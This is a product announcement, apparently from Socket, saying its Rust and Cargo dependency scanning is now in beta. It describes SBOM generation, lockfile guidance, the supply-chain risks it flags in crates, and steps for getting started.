Rust Support Now in Beta

We are promoting Rust support from Experimental to Beta. Over the past several months we validated the feature with enterprise customers across complex Cargo workspaces.

As of today, all users can now analyze Rust projects in Socket. That includes full dependency analysis and SBOM generation for crates published to crates.io. Rust support has been tested with real customer codebases and refined based on that feedback, and it’s ready for broader beta use.

Current Scope in Beta#

In August, we added support for SBOM generation from Cargo.toml-only crates. You can run supply chain checks even when a lockfile is missing. We have also expanded Rust-aware detections and improved stability on large dependency graphs.

Rust scanning supports single crates and full Cargo workspaces, including feature flags and workspace inheritance. You can scan with Cargo.toml only, or add Cargo.lock for pinned, fully reproducible builds. Git or local path dependencies are not supported yet and will appear as unresolved.

If Your JavaScript Stack Uses Rust#

Many JavaScript teams now use Rust-powered tools like SWC, Turbopack, Rspack, Lightning CSS, Biome, and Oxc. If you build or vendor these tools from source, or ship Rust-native add-ons, Socket’s Rust support scans those Cargo projects directly and produces a Rust SBOM alongside supply chain checks. If you only install the tools via npm binaries, Socket’s npm analysis remains your primary line of defense because the Rust crates are not part of your project’s source or build.

Guidance on Lockfiles#

Cargo.toml-only scanning works, but a lockfile is still recommended for the most deterministic results. Feature resolution, target platforms, and workspace settings can change dependency selection, and Cargo.lock captures the exact versions you build.

What Socket Analyzes in Rust Packages#

If you’re new to Socket, the platform analyzes open source dependencies for supply chain risk. For Rust projects, it reads your Cargo metadata, maps the full dependency graph, generates an SBOM, and flags behaviors that traditional SCA tools miss. With this Beta you can now scan Rust repos and review findings in the app, including the following:

• Malicious or risky build scripts that execute during compilation
• Suspicious unsafe usage patterns
• FFI boundary risks where Rust interfaces with other languages
• Hidden telemetry, protestware, and other unexpected behaviors

Socket also detects licenses across your Rust dependencies, surfaces license alerts, and enforces your org’s allow/deny lists. You can export results as SPDX or CycloneDX SBOMs, which include detected license data where available.

How to Get Started#

1. Add or select a Rust repository in Socket.
2. Ensure Cargo.toml is present. Include Cargo.lock if you want pinned analysis.
3. Run a scan to generate an SBOM and review supply chain findings.
4. Set policies that match your team’s tolerance and triage results.

We’re continuing to refine Rust-specific detectors and improve performance and stability as we move toward general availability.

Try it now with your Rust apps and let us know what would help you most as we finalize GA.